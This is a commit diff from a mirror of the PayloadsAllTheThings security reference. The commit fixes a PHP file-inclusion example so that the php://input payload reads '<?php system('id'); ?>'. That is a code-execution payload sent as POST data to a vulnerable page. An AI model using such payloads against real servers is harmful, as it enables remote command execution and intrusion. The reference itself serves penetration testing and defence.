mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 15:03:12 -08:00
Update README.md
This commit is contained in:
@@ -186,7 +186,7 @@ Specify your payload in the POST parameters
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php://input
|
||||
POST DATA: <? system('id'); ?>
|
||||
POST DATA: <?php system('id'); ?>
|
||||
```
|
||||
|
||||
### Wrapper phar://
|
||||
|
||||
Reference in New Issue
Block a user